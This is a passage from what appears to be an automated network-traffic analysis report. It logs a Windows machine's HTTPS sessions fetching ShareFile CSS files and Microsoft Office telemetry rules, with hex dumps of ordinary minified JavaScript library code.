                                                                                                                                                                                                                                                                                Data Ascii: i{constructor(e){super(),this.config=e||{},this.mutations=[],this.mutationId=0}build(e,t,r){const n=new z({mutationCache:this,logger:e.getLogger(),mutationId:++this.mutationId,options:e.defaultMutationOptions(t),state:r,defaultOptions:t.mutationKey?e.get
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 68 28 28 74 3d 3e 7b 76 61 72 20 6e 3b 63 6f 6e 73 74 20 69 3d 6f 2e 67 65 74 28 74 2e 71 75 65 72 79 48 61 73 68 29 3b 69 3f 69 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 3c 74 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 26 26 69 2e 73 65 74 53 74 61 74 65 28 74 2e 73 74 61 74 65 29 3a 6f 2e 62 75 69 6c 64 28 65 2c 7b 2e 2e 2e 6e 75 6c 6c 3d 3d 72 7c 7c 6e 75 6c 6c 3d 3d 28 6e 3d 72 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 29 3f 76 6f 69 64 20 30 3a 6e 2e 71 75 65 72 69 65 73 2c 71 75 65 72 79 4b 65 79 3a 74 2e 71 75 65 72 79 4b 65 79 2c 71 75 65 72 79 48 61 73 68 3a 74 2e 71 75 65 72 79 48 61 73 68 7d 2c 74 2e 73 74 61 74 65 29 7d 29 29 7d 63 6f 6e 73 74 20 61 65 3d 6f 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 76
                                                                                                                                                                                                                                                                                Data Ascii: h((t=>{var n;const i=o.get(t.queryHash);i?i.state.dataUpdatedAt<t.state.dataUpdatedAt&&i.setState(t.state):o.build(e,{...null==r||null==(n=r.defaultOptions)?void 0:n.queries,queryKey:t.queryKey,queryHash:t.queryHash},t.state)}))}const ae=o.createContext(v
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 79 28 69 2c 22 69 73 41 78 69 6f 73 45 72 72 6f 72 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 6f 2e 66 72 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 73 2c 61 2c 75 29 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 69 29 3b 72 65 74 75 72 6e 20 6e 2e 74 6f 46 6c 61 74 4f 62 6a 65 63 74 28 65 2c 63 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 45 72 72 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7d 29 29 2c 6f 2e 63 61 6c 6c 28 63 2c 65 2e 6d 65 73 73 61 67 65 2c 74 2c 72 2c 73 2c 61 29 2c 63 2e 6e 61 6d 65 3d 65 2e 6e 61 6d 65 2c 75 26 26 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 63 2c 75 29 2c 63 7d 2c 65 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 33 34 37 31 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72
                                                                                                                                                                                                                                                                                Data Ascii: y(i,"isAxiosError",{value:!0}),o.from=function(e,t,r,s,a,u){var c=Object.create(i);return n.toFlatObject(e,c,(function(e){return e!==Error.prototype})),o.call(c,e.message,t,r,s,a),c.name=e.name,u&&Object.assign(c,u),c},e.exports=o},3471:(e,t,r)=>{"use str
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 30 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 74 29 7b 69 66 28 74 7c 7c 22 22 3d 3d 3d 74 29 7b 76 61 72 20 72 3d 74 5b 73 5d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 6e 65 78 74 29 72 65 74 75 72 6e 20 74 3b 69 66 28 21 69 73 4e 61 4e 28 74 2e 6c 65 6e 67 74 68 29 29 7b 76 61 72 20 6f 3d 2d 31 2c 69 3d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 3b 2b 2b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 29 69 66 28 6e 2e 63 61 6c 6c 28 74 2c 6f 29 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 5b 6f 5d 2c 72 2e 64 6f 6e 65 3d 21 31 2c 72 3b 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 65 2c 72 2e 64 6f 6e 65 3d 21 30 2c 72 7d 3b 72 65 74 75 72 6e 20 69 2e 6e 65 78
                                                                                                                                                                                                                                                                                Data Ascii: 0)}function F(t){if(t||""===t){var r=t[s];if(r)return r.call(t);if("function"==typeof t.next)return t;if(!isNaN(t.length)){var o=-1,i=function r(){for(;++o<t.length;)if(n.call(t,o))return r.value=t[o],r.done=!1,r;return r.value=e,r.done=!0,r};return i.nex
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 20 77 65 62 20 22 2c 6e 67 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6d 6f 62 69 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 73 63 68 20 22 2c 6e 69 3a 22 20 61 63 20 63 6f 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6d 69 6c 20 6e 65 74 20 6e 6f 6d 20 6f 72 67 20 22 2c 6e 70 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6e 65 74 20 6f 72 67 20 22 2c 6e 72 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 6e 66 6f 20 6e 65 74 20 6f 72 67 20 22 2c 6f 6d 3a 22 20 61 63 20 62 69 7a 20 63 6f 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 65 64 20 6d 69 6c 20 6d 75 73 65 75 6d 20 6e 65 74 20 6f 72 67 20 70 72 6f 20 73 63 68 20 22 2c 70 65 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6d 69 6c 20 6e 65 74 20 6e 6f 6d 20 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: web ",ng:" biz com edu gov mil mobi name net org sch ",ni:" ac co com edu gob mil net nom org ",np:" com edu gov mil net org ",nr:" biz com edu gov info net org ",om:" ac biz co com edu gov med mil museum net org pro sch ",pe:" com edu gob mil net nom or
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 52 49 2e 68 61 73 51 75 65 72 79 28 29 20 61 63 63 65 70 74 73 20 75 6e 64 65 66 69 6e 65 64 2c 20 62 6f 6f 6c 65 61 6e 2c 20 73 74 72 69 6e 67 2c 20 6e 75 6d 62 65 72 2c 20 52 65 67 45 78 70 2c 20 46 75 6e 63 74 69 6f 6e 20 61 73 20 74 68 65 20 76 61 6c 75 65 20 70 61 72 61 6d 65 74 65 72 22 29 7d 7d 2c 69 2e 6a 6f 69 6e 50 61 74 68 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 30 2c 6e 3d 30 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 6f 3d 6e 65 77 20 69 28 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 3b 65 2e 70 75 73 68 28 6f 29 3b 66 6f 72 28 76 61 72 20 73 3d 6f 2e 73 65 67 6d 65 6e
                                                                                                                                                                                                                                                                                Data Ascii: ult:throw new TypeError("URI.hasQuery() accepts undefined, boolean, string, number, RegExp, Function as the value parameter")}},i.joinPaths=function(){for(var e=[],t=[],r=0,n=0;n<arguments.length;n++){var o=new i(arguments[n]);e.push(o);for(var s=o.segmen
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 73 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 29 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 25 32 36 22 29 2c 75 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 2b 3d 22 3d 22 2b 69 2e 64 65 63 6f 64 65 51 75 65 72 79 28 75 5b 31 5d 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 29 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 25 32 36 22 29 29 7d 72 2b 3d 22 3f 22 2b 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 7d 72 65 74 75 72 6e 20 72 2b 3d 69 2e 64 65 63 6f 64 65 51 75 65 72 79 28 74 2e 68 61 73 68 28 29 2c 21 30 29 7d 2c 73 2e 61 62 73 6f 6c 75 74 65 54 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 6f 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2c 73 3d 5b 22 70 72 6f 74 6f
                                                                                                                                                                                                                                                                                Data Ascii: s.escapeQuerySpace).replace(/&/g,"%26"),u[1]!==undefined&&(n+="="+i.decodeQuery(u[1],this._parts.escapeQuerySpace).replace(/&/g,"%26"))}r+="?"+n.substring(1)}return r+=i.decodeQuery(t.hash(),!0)},s.absoluteTo=function(e){var t,r,n,o=this.clone(),s=["proto
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC16384INData Raw: 73 74 20 6c 3d 5b 5d 2c 68 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 57 2c 7b 64 65 66 61 75 6c 74 56 69 73 69 74 6f 72 3a 63 2c 63 6f 6e 76 65 72 74 56 61 6c 75 65 3a 75 2c 69 73 56 69 73 69 74 61 62 6c 65 3a 24 7d 29 3b 69 66 28 21 51 2e 69 73 4f 62 6a 65 63 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 64 61 74 61 20 6d 75 73 74 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 69 66 28 21 51 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 29 29 7b 69 66 28 2d 31 21 3d 3d 6c 2e 69 6e 64 65 78 4f 66 28 65 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 69 72 63 75 6c 61 72 20 72 65 66 65 72 65 6e 63 65 20 64 65 74 65 63 74 65 64 20 69 6e 20 22 2b 72 2e 6a 6f
                                                                                                                                                                                                                                                                                Data Ascii: st l=[],h=Object.assign(W,{defaultVisitor:c,convertValue:u,isVisitable:$});if(!Q.isObject(e))throw new TypeError("data must be an object");return function f(e,r){if(!Q.isUndefined(e)){if(-1!==l.indexOf(e))throw Error("Circular reference detected in "+r.jo


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                104192.168.2.64982713.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC577OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:04 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 01 Aug 2024 12:55:38 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 24c299c0a6423c6f96984a85fb014108.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Bad1D6fRBRgZuJTt7iFgheclWiDbiGmH300Hbe-BVBgq-3y_sjQU8w==
                                                                                                                                                                                                                                                                                Age: 45975
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                105192.168.2.64983313.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC574OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 02 Oct 2024 12:23:36 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: c1rsPnlVHMStDWnkH6zKTdmiP3uPObiLvkV-xeq7Ef9tZeqBew6Z7Q==
                                                                                                                                                                                                                                                                                Age: 45976
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                106192.168.2.64983213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC578OUTGET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:03 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 10:07:36 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: BiKBKsaLORLFCiwluGU5o80yc6Kr3DU9_TVIafmCgOOrBBRnLxqY5w==
                                                                                                                                                                                                                                                                                Age: 45976
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                107192.168.2.64983113.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC572OUTGET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 19:40:42 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 24c299c0a6423c6f96984a85fb014108.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: I9eheh8coZRcosTSWQQVaB-Aabf1IsHKnWeI8ckQsmMZjUs_J_ivjw==
                                                                                                                                                                                                                                                                                Age: 83768
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                108192.168.2.64983713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:19 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                x-ms-request-id: deafa783-901e-007b-5dcf-19ac50000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180519Z-185b7d577bdd4z6mz0c833nvec00000001b000000000ksx9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                109192.168.2.64983813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:19 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 494
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                x-ms-request-id: 9bc89f40-601e-0002-25fa-19a786000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180519Z-185b7d577bd6kqv2c47qpxmgb000000001a000000001f63b
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                110192.168.2.64983613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:19 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB5815C4C"
